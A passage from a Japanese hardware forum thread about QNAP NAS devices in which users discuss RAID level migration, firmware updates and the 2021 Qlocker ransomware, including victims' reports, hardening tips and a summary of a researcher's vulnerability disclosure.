ttps://www.qnap.com/ja-jp/how-to/knowledge-base/article/16tb-storage-limitation
ttps://www.qnap.com/ja-jp/how-to/knowledge-base/article/16tb-storage-limitation
650不明なデバイスさん (ワッチョイ e748-3Tei)
2021/05/05(水) 23:41:40.65ID:UEpeRVTW0 >>649
ああ、そうそう。俺の知識が古かったんだな。ありがとう
ああ、そうそう。俺の知識が古かったんだな。ありがとう
651不明なデバイスさん (ワッチョイ e72d-PwVq)
2021/05/06(木) 05:51:23.34ID:pM68LPkO0 Dropboxの替わりにしたいが素人故にセキュリティ面が怖くてずーっと躊躇してる
652不明なデバイスさん (ワッチョイ 5fb7-NRWi)
2021/05/06(木) 06:33:39.49ID:5p9X0bjt0 結局どうやって侵入されたのかは確定しないままか
653不明なデバイスさん (ワッチョイ c707-Q+lb)
2021/05/06(木) 07:19:50.18ID:QnsSLK6R0654不明なデバイスさん (ワッチョイ c707-Q+lb)
2021/05/06(木) 07:21:05.82ID:QnsSLK6R0655不明なデバイスさん (ワッチョイ 0702-eh0L)
2021/05/06(木) 09:00:10.04ID:v3J2X5Jz0 一つ言えるのは、基本的に最新版のアプリとファームを入れておけってことじゃない?
ファーム更新は慎重にしろとかいう風潮があったけど、実際は文鎮化ファームなんて存在しない。
確かにバグ入りもあったけど、実害なんてほぼ無くて、データ消えたりすることも無い。影響あるのはすぐに直るしね。
機能の追加/更新のみ場合は少し見送っても良いかもだけど、ファームもアプリもセキュリティ更新は適用するのが吉。
模倣犯防ぐためにも原因は公表しないと思うが、確実にセキュリティアップデートでは対策されているでしょ。
ファーム更新は慎重にしろとかいう風潮があったけど、実際は文鎮化ファームなんて存在しない。
確かにバグ入りもあったけど、実害なんてほぼ無くて、データ消えたりすることも無い。影響あるのはすぐに直るしね。
機能の追加/更新のみ場合は少し見送っても良いかもだけど、ファームもアプリもセキュリティ更新は適用するのが吉。
模倣犯防ぐためにも原因は公表しないと思うが、確実にセキュリティアップデートでは対策されているでしょ。
656不明なデバイスさん (オッペケ Sr5b-PUq6)
2021/05/06(木) 09:04:46.31ID:LBzfuIIAr >>655
ホントそうね、アップデート慎重派だったけど多少機能に不具合があっても最新状態にしておく方が良いわ。
ホントそうね、アップデート慎重派だったけど多少機能に不具合があっても最新状態にしておく方が良いわ。
657不明なデバイスさん (スプッッ Sd7f-VnWD)
2021/05/06(木) 09:37:06.23ID:l69VvVDqd それはそうとAmazonフォトのHBS3からの同期って4月30日で出来なくなるんじゃなかったの?
まだ出来てるよね??
まだ出来てるよね??
658不明なデバイスさん (ワッチョイ 5f68-sY7A)
2021/05/06(木) 12:33:01.85ID:Dwr2cwrt0 4ベイ導入で予算の都合でまず2ドライブをシングルで使って容量稼ぐ
で、将来3ドライブ目追加した時にRAID5に移行って可能?
で、将来3ドライブ目追加した時にRAID5に移行って可能?
659不明なデバイスさん (ワッチョイ a7ba-VnWD)
2021/05/06(木) 13:03:10.54ID:gHrpO5es0 512です。
信用ならないのでNETGEARに移行しました。
453Dはサブネットで運用して様子見。
FG40F 買ったので、453D繋いでどんな
動きするか見てます。
453DはHDDのみデータクリアして
ファームと各種アプリは古いままです。
信用ならないのでNETGEARに移行しました。
453Dはサブネットで運用して様子見。
FG40F 買ったので、453D繋いでどんな
動きするか見てます。
453DはHDDのみデータクリアして
ファームと各種アプリは古いままです。
660不明なデバイスさん (ブーイモ MM2b-TQtH)
2021/05/06(木) 14:18:42.89ID:8LXRF84UM やられた人って管理ポートへインターネットから直接アクセスできる環境だった人だよね。
662不明なデバイスさん (ワッチョイ 0702-eh0L)
2021/05/06(木) 15:39:56.90ID:v3J2X5Jz0 >>658
シングルx2に1本足してRAID5への移行は、どこのNASでも無理かな。
最初の2本がRAID1なら、RAID5への移行は可能。
https://www.qnap.com/ja-jp/how-to/tutorial/article/%e3%82%aa%e3%83%b3%e3%83%a9%e3%82%a4%e3%83%b3-raid-%e3%83%ac%e3%83%99%e3%83%ab%e7%a7%bb%e8%a1%8c
オンラインRAIDレベル移行では、次のRAID移行をサポートします。
シングルからRAID 1
RAID 1からRAID 5
RAID 5からRAID 6
シングルx2に1本足してRAID5への移行は、どこのNASでも無理かな。
最初の2本がRAID1なら、RAID5への移行は可能。
https://www.qnap.com/ja-jp/how-to/tutorial/article/%e3%82%aa%e3%83%b3%e3%83%a9%e3%82%a4%e3%83%b3-raid-%e3%83%ac%e3%83%99%e3%83%ab%e7%a7%bb%e8%a1%8c
オンラインRAIDレベル移行では、次のRAID移行をサポートします。
シングルからRAID 1
RAID 1からRAID 5
RAID 5からRAID 6
663不明なデバイスさん (ワッチョイ ff7c-rjHM)
2021/05/06(木) 16:12:15.68ID:lzG4WHiw0664不明なデバイスさん (アウアウウー Saab-QuVS)
2021/05/06(木) 16:22:13.94ID:G8OEGatIa 素直にバックアップから戻そう
665不明なデバイスさん (ワッチョイ 075f-uiaF)
2021/05/06(木) 17:09:10.55ID:C7RqKqQw0 バックアップディスク買えるなら買うんだけど買えないからの相談って感じだね。
どうしたらコスパ良く回せるかを考える感じかな。
シングル2本がフルに使われるという前提だと3本目のディスクを2倍にして一時退避させても元diskをRAID1に構成したら容量半分だから書き戻す空きがない。
3本目は同容量で4本目に2倍の容量を格納するのが良いと思う。
フルで使わずに書き戻せる程度の容量であればRAID1に書き戻してから3本目の新ディスクをRAID1に追加してRAID5に再構成かな。
どうしたらコスパ良く回せるかを考える感じかな。
シングル2本がフルに使われるという前提だと3本目のディスクを2倍にして一時退避させても元diskをRAID1に構成したら容量半分だから書き戻す空きがない。
3本目は同容量で4本目に2倍の容量を格納するのが良いと思う。
フルで使わずに書き戻せる程度の容量であればRAID1に書き戻してから3本目の新ディスクをRAID1に追加してRAID5に再構成かな。
666不明なデバイスさん (ワッチョイ e7b4-zL94)
2021/05/06(木) 17:27:43.42ID:ujt+FWX00 HDD容量に余裕があるくらいなら、2個じゃなく最初は1個でやるべき。
2個目を買う金は貯めておいて、金がたまったらHDDを2個買ってRAID5にする。
2個目を買う金は貯めておいて、金がたまったらHDDを2個買ってRAID5にする。
667不明なデバイスさん (ワッチョイ 8768-sY7A)
2021/05/06(木) 17:40:54.87ID:DojF68zM0 >>658です
なるほど
最初は8TBを2本と考えてましたが、
ではちと足出ますが、
4TBを4本買ってRAID5を組むことにします
で、将来的に1本づつ8TB換装って感じで
トータルとしてはコスト大ですがw
ありがとうございました
データがWoooでiVDR-Sに録り貯めたDTCP-IPな録画データなんで、
一度nasにムーブしたらバックアップや退避はできないですよね?
空けたiVDRカセット順次売れば資金できそうな気もしますしw
ありがとうございました
なるほど
最初は8TBを2本と考えてましたが、
ではちと足出ますが、
4TBを4本買ってRAID5を組むことにします
で、将来的に1本づつ8TB換装って感じで
トータルとしてはコスト大ですがw
ありがとうございました
データがWoooでiVDR-Sに録り貯めたDTCP-IPな録画データなんで、
一度nasにムーブしたらバックアップや退避はできないですよね?
空けたiVDRカセット順次売れば資金できそうな気もしますしw
ありがとうございました
668不明なデバイスさん (ワッチョイ 8768-sY7A)
2021/05/06(木) 17:51:57.02ID:DojF68zM0669不明なデバイスさん (ワッチョイ 075f-uiaF)
2021/05/06(木) 18:35:15.36ID:C7RqKqQw0670不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/06(木) 19:15:48.41ID:ynMqUbtC0671不明なデバイスさん (ワッチョイ 075f-uiaF)
2021/05/06(木) 19:22:38.38ID:C7RqKqQw0 >>670
シングルからRAID1オンラインのままでできるんだ!
シングルからRAID1オンラインのままでできるんだ!
672不明なデバイスさん (ワッチョイ 8768-sY7A)
2021/05/06(木) 19:54:30.70ID:DojF68zM0 ありがとう
あと一個だけ
DTCP-IPなデータでもRAIDレベルの切り替えは可能?
チョサッケン機能が妨害してできないとかないよね?
あと一個だけ
DTCP-IPなデータでもRAIDレベルの切り替えは可能?
チョサッケン機能が妨害してできないとかないよね?
673不明なデバイスさん (ワッチョイ 2701-G0PM)
2021/05/06(木) 21:59:02.01ID:ifbsrLWg0 RAIDをなんだと思ってるのか
674不明なデバイスさん (ワッチョイ 6736-cuz7)
2021/05/06(木) 22:24:19.65ID:ynMqUbtC0 自分も知りたいわ、RAIDじゃないと駄目なのか?
https://www.tekwind.co.jp/QNA/faq/entry_302.php
https://www.tekwind.co.jp/QNA/faq/entry_302.php
675不明なデバイスさん (ブーイモ MMcf-H14/)
2021/05/06(木) 23:22:32.59ID:2CioUDr9M 素直にバックアップからやれば良いのに、と思ってたらそういうことか。
676不明なデバイスさん (ワッチョイ ff02-RZfx)
2021/05/06(木) 23:47:30.51ID:IolOtmQS0 今更ながらですが、!!!READ_MEファイルがhomes、public、webフォルダ直下に作成されていました。
作成日時は4/21_20:30頃です。
ほとんどの個人的なファイルを保存しているMultimediaフォルダには作成されていませんでした。
adminはNAS導入時(251Dで去年夏頃)に無効化しています。
RemoverとQuFirewallはインスト済みで、MR2102というファイルの処理はされているようです。
Multimediaフォルダに7z化されたファイルはゼロで、唯一7z化されていたファイルはWebフォルダ直下のindex.php.7zです。
この状況はセーフでしょうか??
作成日時は4/21_20:30頃です。
ほとんどの個人的なファイルを保存しているMultimediaフォルダには作成されていませんでした。
adminはNAS導入時(251Dで去年夏頃)に無効化しています。
RemoverとQuFirewallはインスト済みで、MR2102というファイルの処理はされているようです。
Multimediaフォルダに7z化されたファイルはゼロで、唯一7z化されていたファイルはWebフォルダ直下のindex.php.7zです。
この状況はセーフでしょうか??
677不明なデバイスさん (ワッチョイ a75f-qFit)
2021/05/06(木) 23:53:06.58ID:qC3dSlaS0 バリバリアウトです
678不明なデバイスさん (オッペケ Sr5b-QuVS)
2021/05/06(木) 23:55:08.95ID:n7HL8fxmr 録画データは牛NAS、PCデータはQNAPで管理してる
679不明なデバイスさん (ワッチョイ 2e02-qZVD)
2021/05/07(金) 00:07:24.56ID:zaiMKRUg0680不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/07(金) 00:08:27.60ID:1Y8ZlMtA0 QNAP Statement About Qlocker Ransomware
https://www.qnap.com/static/landing/2021/qlocker/response/en/
https://www.qnap.com/static/landing/2021/qlocker/response/en/
681不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/07(金) 00:13:47.56ID:1Y8ZlMtA0 >>676
ある意味セーフかな、あとやることは
すべてのアプリを最新版にする
ルーターのUPnPをオフにする
ルーターのポート開放の停止
myQNAPcloudの利用停止
QNAPでUPnPの利用停止
Qufirewallで海外からのアクセスを停止
管理ポートをデフォルトからの変更
くらいかな
ある意味セーフかな、あとやることは
すべてのアプリを最新版にする
ルーターのUPnPをオフにする
ルーターのポート開放の停止
myQNAPcloudの利用停止
QNAPでUPnPの利用停止
Qufirewallで海外からのアクセスを停止
管理ポートをデフォルトからの変更
くらいかな
682不明なデバイスさん (ワッチョイ 8f68-UtBM)
2021/05/07(金) 00:16:24.78ID:/r6W98Rt0683不明なデバイスさん (ワッチョイ cf35-HxUU)
2021/05/07(金) 00:57:11.26ID:ZXvvCwod0684不明なデバイスさん (アウアウカー Sa7b-Xz+M)
2021/05/07(金) 08:43:02.94ID:OP+NObd6a >>683
アイネックスあたりからちゃんと信号生成、コントロールしてくれる変換ケーブルでてるよ
アイネックスあたりからちゃんと信号生成、コントロールしてくれる変換ケーブルでてるよ
685不明なデバイスさん (ワッチョイ 2e02-qZVD)
2021/05/07(金) 09:06:21.73ID:zaiMKRUg0686不明なデバイスさん (ワッチョイ dabd-dxvU)
2021/05/07(金) 09:11:09.31ID:iur5ZYG70 Qlockerにやられたので公式に書かれている通りサポートに問い合わせたら
「既に暗号化されたファイルに対して、こちらの記事が書いている方法を参考して、
暗号化パスワードを取り出す、あるいは暗号化された前のファイルを復元する可能性があります。」
って↓のURL紹介されたんだけど
https://infinitelogins.com/2020/04/29/how-to-crack-encrypted-7z-archives/
小文字大文字数字の組み合わせで32桁のパスワードってことは
62^32=2.2726579e+57、つまり約23阿僧祇通りもあるってことでしょ
こんなの総当りするのは無理では…
「既に暗号化されたファイルに対して、こちらの記事が書いている方法を参考して、
暗号化パスワードを取り出す、あるいは暗号化された前のファイルを復元する可能性があります。」
って↓のURL紹介されたんだけど
https://infinitelogins.com/2020/04/29/how-to-crack-encrypted-7z-archives/
小文字大文字数字の組み合わせで32桁のパスワードってことは
62^32=2.2726579e+57、つまり約23阿僧祇通りもあるってことでしょ
こんなの総当りするのは無理では…
687不明なデバイスさん (ワッチョイ 8f68-UtBM)
2021/05/07(金) 09:21:46.42ID:u25dMIFR0688不明なデバイスさん (ワッチョイ 63ca-NPDn)
2021/05/07(金) 09:59:27.06ID:LBjF23pW0689不明なデバイスさん (ワッチョイ 0bef-5/s0)
2021/05/07(金) 10:57:30.77ID:M5amcr/h0 とりあえずQNAPだけで揃えるのは危ないということは理解した
690不明なデバイスさん (ワッチョイ 0b10-GWW8)
2021/05/07(金) 11:06:53.43ID:Szq7WCrT0691不明なデバイスさん (ワッチョイ 6ac3-UHqe)
2021/05/07(金) 11:34:00.13ID:y2w+tiEe0 QNAPのバックアップがQNAPとかギャグでしょ
692不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/07(金) 12:39:19.89ID:1Y8ZlMtA0693不明なデバイスさん (ワッチョイ 9f5f-Fod4)
2021/05/07(金) 13:19:37.33ID:h05G5aPT0 >>683
秋葉のハードオフで適当にジャンクの4pinファン5個くらい買って3個は元よりうるさかったりコントロールだめだったりしたけど2個は異音もしなくて普通に動いたよ。
全部でも1000円くらいだった。
秋葉のハードオフで適当にジャンクの4pinファン5個くらい買って3個は元よりうるさかったりコントロールだめだったりしたけど2個は異音もしなくて普通に動いたよ。
全部でも1000円くらいだった。
694不明なデバイスさん (ワッチョイ 8f68-UtBM)
2021/05/07(金) 15:33:52.03ID:/XMFnVhH0 >>690
おっさんはカールセーガンのコスモスの時のIBMのCMで覚えたw
おっさんはカールセーガンのコスモスの時のIBMのCMで覚えたw
695不明なデバイスさん (ワッチョイ 8f68-UtBM)
2021/05/07(金) 15:36:40.81ID:/XMFnVhH0696不明なデバイスさん (ブーイモ MMd6-OEQW)
2021/05/07(金) 15:52:08.53ID:IyVd8uGwM 実に76桁
697不明なデバイスさん (ワッチョイ ea7f-dmY4)
2021/05/07(金) 19:28:17.59ID:2yilfXhY0 最近はqsyncしか使ってなかったけどadminと各ユーザーデータやられた
どーしたもんか。。。
どーしたもんか。。。
698不明なデバイスさん (ワッチョイ 2664-b1DD)
2021/05/07(金) 19:32:45.84ID:4QYTjIZQ0 >>691
実際NASのバックアップなら同メーカーのNASになると思う
実際NASのバックアップなら同メーカーのNASになると思う
699不明なデバイスさん (アウアウクー MM73-4h8C)
2021/05/07(金) 19:49:52.27ID:Ca2+3eAjM700不明なデバイスさん (ワッチョイ 8f68-UtBM)
2021/05/07(金) 20:10:48.90ID:ZaEvP9gg0 ハードコードが原因ならそう声明出して、その箇所抜いたファーム出したって宣言してくれればおっかなびっくり運用せんでええのにな
原因うやむやにしてのらりくらりかわそうとしてるからいつまでたってもモヤモヤしたままなんや
原因うやむやにしてのらりくらりかわそうとしてるからいつまでたってもモヤモヤしたままなんや
701不明なデバイスさん (ブーイモ MMd6-OEQW)
2021/05/07(金) 20:19:17.45ID:dO+oIZmzM まだ経路が不明なのか、或いは別のバックドアの存在とかあったりしてなあ。
702不明なデバイスさん (ワッチョイ 2e7c-7n3v)
2021/05/07(金) 21:31:25.09ID:A9mS0lUg0 今回の事象の全てのパッチが適用される期間を待ってからでしょ、普通
703不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/07(金) 21:39:36.25ID:1Y8ZlMtA0 大まかに言って、ハードコードって言ってもファームウェアに
書き込んであるわけじゃないからね、念のため
書き込んであるわけじゃないからね、念のため
704不明なデバイスさん (ワッチョイ fb48-iv4Q)
2021/05/07(金) 23:10:02.68ID:qu44CQkD0 QNAP的にはQTSは「ファームウェア」という定義だよ
705不明なデバイスさん (ワッチョイ eaad-7oqX)
2021/05/07(金) 23:22:17.72ID:RRV0lnDO0 ん?お茶目なもんがポロポロ出てきたのってHBS3でしょ?
707不明なデバイスさん (ワッチョイ 7e68-jjtP)
2021/05/08(土) 00:07:27.57ID:I08Qqoy/0 TS-473AだけじゃなくてTS-673A/873AもAmazonで価格出ましたね。
どの機種も在庫切れですが。
TS-473A 125,720
TS-673A 140,237
TS-873A 159,688
どの機種も在庫切れですが。
TS-473A 125,720
TS-673A 140,237
TS-873A 159,688
708不明なデバイスさん (ワッチョイ ea7f-dmY4)
2021/05/08(土) 02:50:07.74ID:iLRr7Mw30709不明なデバイスさん (アウアウクー MM73-4h8C)
2021/05/08(土) 10:50:42.65ID:kchhVTnxM >>708
原因と目されているHBS3も使っていなかった(インストールしていなかった)ということ?
原因と目されているHBS3も使っていなかった(インストールしていなかった)ということ?
710不明なデバイスさん (ワッチョイ e356-LSpj)
2021/05/08(土) 10:58:37.86ID:K4OmK3Cz0 外部に繋いでたらやられるって事?
711不明なデバイスさん (ワッチョイ eaad-7oqX)
2021/05/08(土) 11:06:51.47ID:3n/iW01j0 話題の脅威に限らず、外向きにサービス提供したらリスクは増大するもんです
UPnP(本来コイツは悪くない)が管理者の知らないとこで便利さを発揮して
自覚のないままに自宅サーバ外部公開中になってる例もありそうな気はします
UPnP(本来コイツは悪くない)が管理者の知らないとこで便利さを発揮して
自覚のないままに自宅サーバ外部公開中になってる例もありそうな気はします
712不明なデバイスさん (ワッチョイ be9b-gUNg)
2021/05/08(土) 11:08:44.76ID:9n+tXHE60 ランサムとは関係ないんだけど
管理ページ(8080)じゃなくてWEBサーバー(80)へのアクセスログってどこで見れる?
管理ページのシステムログから見れるログには無い(ような気がする)んだけど…
管理ページ(8080)じゃなくてWEBサーバー(80)へのアクセスログってどこで見れる?
管理ページのシステムログから見れるログには無い(ような気がする)んだけど…
713不明なデバイスさん (ワッチョイ 6aca-x/S3)
2021/05/08(土) 11:13:43.53ID:Ob/ZEZ0+0 新しいファームウェアにしたらNASがネットにつながらないとか出て、AppCenterとかも認識しなかった。
前のファームウェアにしたらあっさりと治ったが
前のファームウェアにしたらあっさりと治ったが
714不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/08(土) 12:48:53.36ID:vHXxrvK+0 >>712
Qulog centerのシステムアクセスログはどう?
Qulog centerのシステムアクセスログはどう?
716不明なデバイスさん (ワッチョイ 1ab7-2/10)
2021/05/08(土) 14:27:45.85ID:F2L7tJFD0717不明なデバイスさん (ワッチョイ 8f68-UtBM)
2021/05/08(土) 15:24:39.49ID:OXEAS//K0 当分はローカルのみ運用しとくかと切り替えてはや1ヶ月超
3月のencryptと4月の7zipは別の穴なんかね?
同じだとしたら間抜けやなあ
3月のencryptと4月の7zipは別の穴なんかね?
同じだとしたら間抜けやなあ
718不明なデバイスさん (ベーイモ MMb6-ZzV+)
2021/05/08(土) 15:30:29.42ID:d51IxJyWM719不明なデバイスさん (スッップ Sd8a-r6MZ)
2021/05/08(土) 15:37:10.38ID:ZhoUlXXtd >>718
再起動したら何事もなかったかのように帰ってくるやつー
再起動したら何事もなかったかのように帰ってくるやつー
720不明なデバイスさん (ワッチョイ 8a39-TQTV)
2021/05/08(土) 18:41:57.81ID:KOVLEv1M0 久しぶりに覗いたら凄い事になってたのね
マイニングにハマってQNAP暫く止めてマイニング機をファイルサーバーにしてたから難を逃れたわ
そして最近HDDマイニングにハマってQNAPも中身全部バックアップ取って普段絶対にやらない
M.2SSDのキャッシュも含めRAID0セットを多数作ってまた使い始めた
マイニングにハマってQNAP暫く止めてマイニング機をファイルサーバーにしてたから難を逃れたわ
そして最近HDDマイニングにハマってQNAPも中身全部バックアップ取って普段絶対にやらない
M.2SSDのキャッシュも含めRAID0セットを多数作ってまた使い始めた
721不明なデバイスさん (ワッチョイ eaad-7oqX)
2021/05/08(土) 20:11:27.46ID:3n/iW01j0 >>712
web鯖は使ってないし現代的なver.のQTSだと違うのかもしれないけど
$ grep -n '^ *\(CustomLog\|ErrorLog\)' `find / -name httpd.conf 2> /dev/null`
275:ErrorLog "logs/error_log"
304: CustomLog "logs/access_log" common
$ find / -type d -name apache 2> /dev/null
/etc/default_config/apache
/mnt/ext/opt/apache
/mnt/HDA_ROOT/.config/apache
$ ls -l /mnt/ext/opt/apache/logs/
web鯖は使ってないし現代的なver.のQTSだと違うのかもしれないけど
$ grep -n '^ *\(CustomLog\|ErrorLog\)' `find / -name httpd.conf 2> /dev/null`
275:ErrorLog "logs/error_log"
304: CustomLog "logs/access_log" common
$ find / -type d -name apache 2> /dev/null
/etc/default_config/apache
/mnt/ext/opt/apache
/mnt/HDA_ROOT/.config/apache
$ ls -l /mnt/ext/opt/apache/logs/
722不明なデバイスさん (ワッチョイ ea7f-dmY4)
2021/05/09(日) 01:40:06.45ID:cz/dJoIJ0723不明なデバイスさん (ワッチョイ 2301-Qnne)
2021/05/09(日) 01:52:43.38ID:pJU7gj3v0 DNSがなんちゃらって出てるならちゃんと名前解決してやれよ
724不明なデバイスさん (ワッチョイ d35f-ZzV+)
2021/05/09(日) 02:27:50.34ID:bRQZthyg0 >>723
ちゃんとDNSサーバー指定しててもその現象出るのよ
ウチは1.1.1.1と8.8.8.8にしてたんだけど全然繋がらなくなってしまってどうしようかと思ってたけどローカルのルーター指定したらなんとか出れるようになった
ちゃんとDNSサーバー指定しててもその現象出るのよ
ウチは1.1.1.1と8.8.8.8にしてたんだけど全然繋がらなくなってしまってどうしようかと思ってたけどローカルのルーター指定したらなんとか出れるようになった
725不明なデバイスさん (ワッチョイ 2602-Gc5h)
2021/05/09(日) 09:58:00.47ID:jU90MTAp0 くっそーまたきてやがる
なんなんだ
ネットから外しても書き換え進行中だしMalware Removerにも引っかからん
なんなんだ
ネットから外しても書き換え進行中だしMalware Removerにも引っかからん
726不明なデバイスさん (JP 0H5a-C7Xb)
2021/05/09(日) 10:08:42.88ID:XvnpwkjhH まだ未知の脆弱性があるのかね
QNAPやばいな・・・
怖くてLANに接続できない
QNAPやばいな・・・
怖くてLANに接続できない
727不明なデバイスさん (ワッチョイ b782-DjaX)
2021/05/09(日) 10:26:37.45ID:3Ym5sqDX0 金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ
728不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/09(日) 12:29:54.20ID:G9Nqphv10730不明なデバイスさん (ワッチョイ 2602-Gc5h)
2021/05/09(日) 13:36:05.37ID:jU90MTAp0 QTS 4.5.3.1652
HBS 3 Hybrid Bsckup Sync V16.0.0419
Malware Remover V4.6.1.1
HBS 3 Hybrid Bsckup Sync V16.0.0419
Malware Remover V4.6.1.1
731不明なデバイスさん (ワッチョイ 7336-L7gv)
2021/05/09(日) 13:46:41.20ID:lUF152Aj0 最新にしても食らうんですね。怖いねぇ。
自分は大丈夫っぽいけど、アプリと開放ポートの差なんですかね。
自分は大丈夫っぽいけど、アプリと開放ポートの差なんですかね。
733不明なデバイスさん (ワッチョイ 4ab1-Jaru)
2021/05/09(日) 13:58:15.66ID:l8xbsHi40 さすが自称上級者とそのためのNASだな。
いつまでも不具合含めて試されるNAS
頑張れよ
いつまでも不具合含めて試されるNAS
頑張れよ
734不明なデバイスさん (JP 0Hc3-sGlf)
2021/05/09(日) 14:35:37.37ID:MFKdWlofH TS-2201RAID1組んでるけどディスク1がI/Oエラーになった。
交換しようと思うけど、ホットスワップで抜いて入れ替えるのはまずいのかな?コントロールパネルからストレージマネージャー開けてみたたけど、RAID管理の項目がグレーアウトしてて選択できないんだ……。
一旦電源落として入れ換え→再立ち上げでいいのかな。ちなみに4TB→8TBへの入れ替え予定です。
交換しようと思うけど、ホットスワップで抜いて入れ替えるのはまずいのかな?コントロールパネルからストレージマネージャー開けてみたたけど、RAID管理の項目がグレーアウトしてて選択できないんだ……。
一旦電源落として入れ換え→再立ち上げでいいのかな。ちなみに4TB→8TBへの入れ替え予定です。
735不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/09(日) 14:35:39.80ID:G9Nqphv10 とりあえずアプリをすべて最新にしておこう。
インターネットからの接続の遮断もお忘れなく。
インターネットからの接続の遮断もお忘れなく。
736不明なデバイスさん (ワッチョイ be63-88Jm)
2021/05/09(日) 14:57:42.96ID:IYubrzn/0 WAN接続切って、ローカルだけで使うのってどうやるの?
737不明なデバイスさん (ブーイモ MMd6-OEQW)
2021/05/09(日) 14:57:53.31ID:XcMPFQKNM 何となくだけど俺なら外付けでバックアップからかなぁ
738不明なデバイスさん (ワッチョイ 2a00-wWsF)
2021/05/09(日) 14:58:34.03ID:MNhuaSB70 >>725
変更できるものは全て変えたのだろうか?
adminアカウント、パスワード、ポート、不要なサービスの停止、ルーターの設定、DDNS、グローバルIP
もしかしたら既に他に何か仕込まれてるかも知れんから最悪初期化?
あと書き換えが始まってしまったらネットから切断しても意味ないやん
変更できるものは全て変えたのだろうか?
adminアカウント、パスワード、ポート、不要なサービスの停止、ルーターの設定、DDNS、グローバルIP
もしかしたら既に他に何か仕込まれてるかも知れんから最悪初期化?
あと書き換えが始まってしまったらネットから切断しても意味ないやん
739不明なデバイスさん (ワッチョイ be63-88Jm)
2021/05/09(日) 15:00:30.84ID:IYubrzn/0740不明なデバイスさん (テテンテンテン MMe6-uo/I)
2021/05/09(日) 15:03:26.06ID:ObFG9XHdM TS-228に4TBのHDD入れて使ってたが、空きがなくなって来たので6TBの HDD購入したんだが、NTT-XでTS-230が18000以下だったので衝動買いしちまった。
741不明なデバイスさん (ワッチョイ 7f6e-69F1)
2021/05/09(日) 17:30:46.14ID:uhXbDEzO0 最初のマルウェアで対策されるのを考慮して
最初の段階で既に何か別に仕掛けられてないだろうか?
だとするとポート遮断とかでも安心できないぞ
何かをトリガーにして自動的に暗号化開始とかの2段構えとかシャレにならん
もしそうならネットワーク遮断してても時すでにお寿司だな
最初の段階で既に何か別に仕掛けられてないだろうか?
だとするとポート遮断とかでも安心できないぞ
何かをトリガーにして自動的に暗号化開始とかの2段構えとかシャレにならん
もしそうならネットワーク遮断してても時すでにお寿司だな
742不明なデバイスさん (ワッチョイ 5bf3-Fhmz)
2021/05/09(日) 20:31:41.07ID:ukcuohV80 長文のまとめ
この問題を最初に発見したsecuringsam.comというセキュリティー会社によると、
調査の結果、QNAPにはコマンドインジェクションとSQLインジェクションの脆弱性が
あり、インターネットを通じてアクセス可能なマシンがあった場合、この脆弱性を
利用して外部からAdmin特権を奪取することが可能なことがわかったとしている。
そして、この会社はこの脆弱性を昨年の10月にQNAPに通報した。
ところが、QNAPは通報を無視。そのため、この会社は再度、メール連絡。
しかしQNAPは対応はせず、単に自動応答のメールで返答だけ返してきたとのこと。
その後、最初の通報から3ヶ月程、経過して後で、会社は再度、連絡したところ、
QNAPからは脆弱性が存在していることは把握してるが、問題解決には及んでいない
と返答してきたとのこと。
セキュリティー会社側は、非公開期間が終了したことを理由に3/31に脆弱性の
詳細をブログ記事で公開。
しかし、状況は既に遅く、この脆弱性を付いた攻撃は3/21頃から開始されていた。
ソースsecuringsam.com/new-vulnerabilities-allow-complete-takeover
この問題を最初に発見したsecuringsam.comというセキュリティー会社によると、
調査の結果、QNAPにはコマンドインジェクションとSQLインジェクションの脆弱性が
あり、インターネットを通じてアクセス可能なマシンがあった場合、この脆弱性を
利用して外部からAdmin特権を奪取することが可能なことがわかったとしている。
そして、この会社はこの脆弱性を昨年の10月にQNAPに通報した。
ところが、QNAPは通報を無視。そのため、この会社は再度、メール連絡。
しかしQNAPは対応はせず、単に自動応答のメールで返答だけ返してきたとのこと。
その後、最初の通報から3ヶ月程、経過して後で、会社は再度、連絡したところ、
QNAPからは脆弱性が存在していることは把握してるが、問題解決には及んでいない
と返答してきたとのこと。
セキュリティー会社側は、非公開期間が終了したことを理由に3/31に脆弱性の
詳細をブログ記事で公開。
しかし、状況は既に遅く、この脆弱性を付いた攻撃は3/21頃から開始されていた。
ソースsecuringsam.com/new-vulnerabilities-allow-complete-takeover
743不明なデバイスさん (ワッチョイ 9f5f-iHT9)
2021/05/09(日) 20:37:07.11ID:W64opXqV0 どんなに理不尽でも、免責事項なんだろうよ。ユーザーができるのは「これからは買わない」だけ。
744不明なデバイスさん (ワッチョイ 2682-DjaX)
2021/05/09(日) 20:41:18.36ID:ueYbuxpv0 金返せ
745不明なデバイスさん (ワッチョイ 5bf3-Fhmz)
2021/05/09(日) 20:47:45.05ID:ukcuohV80 この脆弱性の発見者によると、QNAPのQTSはバックグランドでAdmin権限のコマンド
を/mnt/HDA_ROOT/home/httpd/cgi-bin以下にあるcgiプログラムを起動することで
実行してるらしい。そのため、QNAPのwebサーバーのコマンドインジェクションの脆弱性
を付いて内部に侵入した場合、Admin権限がなくてもcgiプログラムを実行することで
Admin権限のコマンドが実行可能だと言ってる。これが正しければ、QNAPが脆弱性があ
るのは分かったが、修正には及んでないと答えたのはある意味、わかるというか、多分、
そう簡単には修正できるような脆弱性じゃなかったのかもね。というか、QNAPは根本的
